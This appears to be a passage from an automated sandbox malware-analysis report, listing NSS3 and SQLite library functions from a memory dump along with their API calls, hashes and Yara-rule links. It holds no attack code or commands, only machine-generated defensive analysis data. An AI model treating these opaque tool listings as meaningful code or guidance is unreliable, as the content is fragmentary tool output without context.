Part of subcall function 6BCCA690: PR_NewCondVar.NSS3(?), ref: 6BCCA6B4

PR_IntervalNow.NSS3 ref: 6BCCAAEC
EnterCriticalSection.KERNEL32(?), ref: 6BCCAB0A
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6BCCAB67
_PR_MD_UNLOCK.NSS3(?), ref: 6BCCAB8B

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CondCriticalEnterErrorIntervalSectionValuecalloc
String ID:
API String ID: 318662135-0
Opcode ID: 7359a51fcdc5448e376b069d3f7528842d2ce405896d973a97d5977d0c5443d7
Instruction ID: 4cc69d08536c7e9948e8e104eb395283460e06f90d191976b7be789e5060aec2
Opcode Fuzzy Hash: 7359a51fcdc5448e376b069d3f7528842d2ce405896d973a97d5977d0c5443d7
Instruction Fuzzy Hash: A8417EB5A103059FC750DF29C88490BBBF6BF9971471445AAE8198B306F775EA40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB6AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(00000000,6BBBB21D,00000000,00000000,6BBBB219,?,6BBB6BFB,00000000,?,00000000,00000000,?,?,?,6BBBB21D), ref: 6BBB6B01

Part of subcall function 6BC0FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6BC0FE08
Part of subcall function 6BC0FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6BC0FE1D
Part of subcall function 6BC0FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6BC0FE62

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6BBBB219,?,6BBB6BFB,00000000,?,00000000,00000000,?,?,?,6BBBB21D), ref: 6BBB6B36
PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6BBB6B47
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6BBB6B8A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6BBB6BB6

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
String ID:
API String ID: 1773792728-0
Opcode ID: 621b6ddcd24c6d1bfc5e182adc50cc30f5b8826e2bf3cfd6f3a0a316b84792b8
Instruction ID: 2e4ea7b60dac532216173644bc02dc32fa36607e88100f22a3fb300875671ea2
Opcode Fuzzy Hash: 621b6ddcd24c6d1bfc5e182adc50cc30f5b8826e2bf3cfd6f3a0a316b84792b8
Instruction Fuzzy Hash: A22128729103945BEB208FA4CC42F6ABBF8DF45754F054569EC0A97251FB39EE50C790

Uniqueness

Uniqueness Score: -1.00%

Function 6BC24BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6BC24BDD

Part of subcall function 6BC10FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BBB87ED,00000800,6BBAEF74,00000000), ref: 6BC11000
Part of subcall function 6BC10FF0: PR_NewLock.NSS3(?,00000800,6BBAEF74,00000000), ref: 6BC11016
Part of subcall function 6BC10FF0: PL_InitArenaPool.NSS3(00000000,security,6BBB87ED,00000008,?,00000800,6BBAEF74,00000000), ref: 6BC1102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6BC24C03

Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC110F3
Part of subcall function 6BC110C0: EnterCriticalSection.KERNEL32(?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1110C
Part of subcall function 6BC110C0: PL_ArenaAllocate.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11141
Part of subcall function 6BC110C0: PR_Unlock.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11182
Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1119C

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6BC24C15
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6BC24C3E

Part of subcall function 6BC0F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BC0F0C8
Part of subcall function 6BC0F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BC0F122

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6BC24C85

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
String ID:
API String ID: 227267669-0
Opcode ID: 65db47fa677f9a5f8818137096c915a116f453f4a7513b3a20254388ae7b5dff
Instruction ID: 95a53e75d232f23cc06e53932a163b9237456bca4fe3fe3cfb6a061dc70f6d61
Opcode Fuzzy Hash: 65db47fa677f9a5f8818137096c915a116f453f4a7513b3a20254388ae7b5dff
Instruction Fuzzy Hash: B22108B2D102116BEB110E699C42F6B369CEF41368F040174FE68D7390FB79DA108695

Uniqueness

Uniqueness Score: -1.00%

Function 6BC08970 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6BBB61C4,?,6BBB5639,00000000), ref: 6BC08991
TlsGetValue.KERNEL32(?,?,?,?,?,6BBB5639,00000000), ref: 6BC089AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BBB5639,00000000), ref: 6BC089C6
PR_WaitCondVar.NSS3 ref: 6BC089F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6BBB5639,00000000), ref: 6BC08A0C

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 9d78964e07375cfb6b04681c522ea868862a62d0ba8fc3b4a36c2a32b1b5143b
Instruction ID: 8a76c472fec721e494dea80396e52027d66f0c8ca9a54be70b8ea8515e1f1d88
Opcode Fuzzy Hash: 9d78964e07375cfb6b04681c522ea868862a62d0ba8fc3b4a36c2a32b1b5143b
Instruction Fuzzy Hash: CC21B0B4914605CFDB00AF78C48566EBBF4FF06308F4186A9DC989B205FB35DA94CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBA09E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6BBA06A2,00000000,?), ref: 6BBA09F8
malloc.MOZGLUE(0000001F), ref: 6BBA0A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6BBA0A33

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

PR_Free.NSS3(?), ref: 6BBA0A6C
PR_Free.NSS3(?), ref: 6BBA0A87

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 38871004eb5fc3bb72806b8181772ad2cd4359d8d86aa94f46d487395c2fd4bc
Instruction ID: 8db66c78be39a82ade01621ccac9d408989700d9c4abe2659039c7220d5ab83c
Opcode Fuzzy Hash: 38871004eb5fc3bb72806b8181772ad2cd4359d8d86aa94f46d487395c2fd4bc
Instruction Fuzzy Hash: 9511E1B2C08B819BF7109F34C982B17B3A8FB11314FC05939D85686900F739F554CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC44AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

PR_MemUnmap.NSS3(00015180,00000005,?,6BC44AD1), ref: 6BC44B62
free.MOZGLUE(?,00015180,00000005,?,6BC44AD1), ref: 6BC44B76

Part of subcall function 6BC403C0: CloseHandle.KERNEL32(?,?,?,?,6BC44B27,?,?,00015180,00000005,?,6BC44AD1), ref: 6BC403E0
Part of subcall function 6BC403C0: GetLastError.KERNEL32(?,6BC44B27,?,?,00015180,00000005,?,6BC44AD1), ref: 6BC403FD

Part of subcall function 6BC403C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6BC44B27,?,?,00015180,00000005,?,6BC44AD1), ref: 6BC40419
Part of subcall function 6BC403C0: free.MOZGLUE(?,?,6BC44B27,?,?,00015180,00000005,?,6BC44AD1), ref: 6BC40420

CloseHandle.KERNEL32(?,00015180,00000005,?,6BC44AD1), ref: 6BC44B96
free.MOZGLUE(?,?,6BC44AD1), ref: 6BC44B9D
memset.VCRUNTIME140(6BD12F9C,00000000,00000090,00015180,00000005,?,6BC44AD1), ref: 6BC44BB2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
String ID:
API String ID: 447902086-0
Opcode ID: 798a33c1f30bac2b6f25c0a0058832792eb8753a8801610c9de7063c281e688d
Instruction ID: c631cbb3ff7f2db8088641fb8417364f46c8d2bd466424dba9136ac61ba95fd3
Opcode Fuzzy Hash: 798a33c1f30bac2b6f25c0a0058832792eb8753a8801610c9de7063c281e688d
Instruction Fuzzy Hash: B81122B2812500BBEE308F64CC07B46F7A9FB02228F450034E5082B110FB7AE746D7E6

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB3BF0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BBB3C0E
EnterCriticalSection.KERNEL32 ref: 6BBB3C23
PL_HashTableLookup.NSS3 ref: 6BBB3C3B
SECITEM_DupItem_Util.NSS3 ref: 6BBB3C47
PR_Unlock.NSS3 ref: 6BBB3C5E

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalEnterHashItem_LookupSectionTableUnlockUtilValue
String ID:
API String ID: 1352239609-0
Opcode ID: a66667fb2dfcfddf3ec1f666d1691e4f4273de3222c872b78f963e438b8e211e
Instruction ID: 4b7c8b95c268e99a8adc5ed07e14406a9b6d51f61c0b7f6377d3c2424800bca9
Opcode Fuzzy Hash: a66667fb2dfcfddf3ec1f666d1691e4f4273de3222c872b78f963e438b8e211e
Instruction Fuzzy Hash: 2601C4719447548FEB10AFBCC08642AFBE8EA06644F420A29DC98C7200FB35D8D4C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC549C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(000A2CD6,00000000,00000000,00000678,?,?,6BC45F34,00000A20), ref: 6BC549EC

Part of subcall function 6BC0FAB0: free.MOZGLUE(?,-00000001,?,?,6BBAF673,00000000,00000000), ref: 6BC0FAC7

SECITEM_ZfreeItem_Util.NSS3(000A2CEA,00000000,6BC45F34,00000A20,?,?,?,?,?,?,?,?,?,6BC4AAD4), ref: 6BC549F9
SECITEM_ZfreeItem_Util.NSS3(000A2CBE,00000000,?,?,6BC45F34,00000A20,?,?,?,?,?,?,?,?,?,6BC4AAD4), ref: 6BC54A06
free.MOZGLUE(?,?,?,?,?,6BC45F34,00000A20), ref: 6BC54A16
free.MOZGLUE(000A2CB6,?,?,?,?,6BC45F34,00000A20), ref: 6BC54A1C

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID:
API String ID: 2193358613-0
Opcode ID: f3cf265c7cf7c2d4cf10485d6d7bf809729bb482cc5ec847609cc97f78fd6db8
Instruction ID: 47520b15d0c605a9e78dec0e41ef135824b1a9a5a2f057c2f3d93a8e1fd38978
Opcode Fuzzy Hash: f3cf265c7cf7c2d4cf10485d6d7bf809729bb482cc5ec847609cc97f78fd6db8
Instruction Fuzzy Hash: 50015AB6A001049FCB00CF65DCC5C577BBCEF8A20970480A5E909CB206F735EA64CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC2A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BCC2A5B
free.MOZGLUE(?), ref: 6BCC2A6D
strdup.MOZGLUE(?), ref: 6BCC2A7B
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BCC2A96
PR_ExitMonitor.NSS3 ref: 6BCC2AB5

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Monitor$EnterErrorExitfreestrdup
String ID:
API String ID: 1948362043-0
Opcode ID: b5420452ec2fabf80a8ad5b45e9dac2ab4fa0ead5637e3ffba5a6d4915263e98
Instruction ID: 5f7673f13b7134fe7723d3d697cec54ee060ec666f033679b3a64e21df7851a1
Opcode Fuzzy Hash: b5420452ec2fabf80a8ad5b45e9dac2ab4fa0ead5637e3ffba5a6d4915263e98
Instruction Fuzzy Hash: D1F0A4B2E1113497EE20AF64DC07707B764AB21A98F440070D8099E111F77ADA15C6D7

Uniqueness

Uniqueness Score: -1.00%

Function 6BC82B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BC82B64

Strings

misuse, xrefs: 6BC82B58
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BC82B4E
%s at line %d of [%.10s], xrefs: 6BC82B5D

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: 943c8be4cc36177ea2cf162d30c5f1347e48a00ca4a948996c274877fe5e9919
Instruction ID: 4f8964f52284fcc7e5be8b7244d80f6f5c83fb8ff89477d9980dfd1084fdfedc
Opcode Fuzzy Hash: 943c8be4cc36177ea2cf162d30c5f1347e48a00ca4a948996c274877fe5e9919
Instruction Fuzzy Hash: AA51E270B212064BEB04CE6988A97BABBE2AF45318F04417DC896DF291F729DA45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6BB44AC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6BB44C2B

Strings

winWrite2, xrefs: 6BB44C01
delayed %dms for lock/sharing conflict at line %d, xrefs: 6BB44C24
winWrite1, xrefs: 6BB44BC2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 632333372-1808655853
Opcode ID: 07de0f98205cd64ed02938b68ad26e5eac3ea74788e06e4df98abfcd10e210e4
Instruction ID: 8be7d54b1d2dcfa5931f14ef3237647794f6f6b3720a51a12877742e8e50ea52
Opcode Fuzzy Hash: 07de0f98205cd64ed02938b68ad26e5eac3ea74788e06e4df98abfcd10e210e4
Instruction Fuzzy Hash: 8C41C371A043459BD704CF29C881A5FBBE9FFC9364F10866DF8588B294EB74DA118B92

Uniqueness

Uniqueness Score: -1.00%

Function 6BC86B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

sqlite3_snprintf.NSS3(?,6BC86AC0,6BCEAAF9,00000000,?,6BC86AC0,?), ref: 6BC86BA9
sqlite3_free.NSS3(00000000,?,?,?,?,?,6BC86AC0,?), ref: 6BC86BB2
sqlite3_snprintf.NSS3(?,6BC86AC0,OsError 0x%lx (%lu),00000000,00000000,?,6BC86AC0,?), ref: 6BC86BD9

Strings

OsError 0x%lx (%lu), xrefs: 6BC86BCE

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_snprintf$sqlite3_free
String ID: OsError 0x%lx (%lu)
API String ID: 2089385377-3720535092
Opcode ID: 11cd4eb729bdb5a1fee6e66c678a3b1e05f657aee5eb285e0ee6b7315673f839
Instruction ID: 7a1e33863583c6d57fde34a365947dab274609712701db766407cba448b9ed0f
Opcode Fuzzy Hash: 11cd4eb729bdb5a1fee6e66c678a3b1e05f657aee5eb285e0ee6b7315673f839
Instruction Fuzzy Hash: 9211A575910115ABEB08DFE5DC4ADBFBBB9EF86349700003CF50557151EB249E05CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC7DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00005919,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6BC7DC98,?,?,?,?), ref: 6BC7DBC4

Strings

misuse, xrefs: 6BC7DBB8
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BC7DBAE
%s at line %d of [%.10s], xrefs: 6BC7DBBD

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

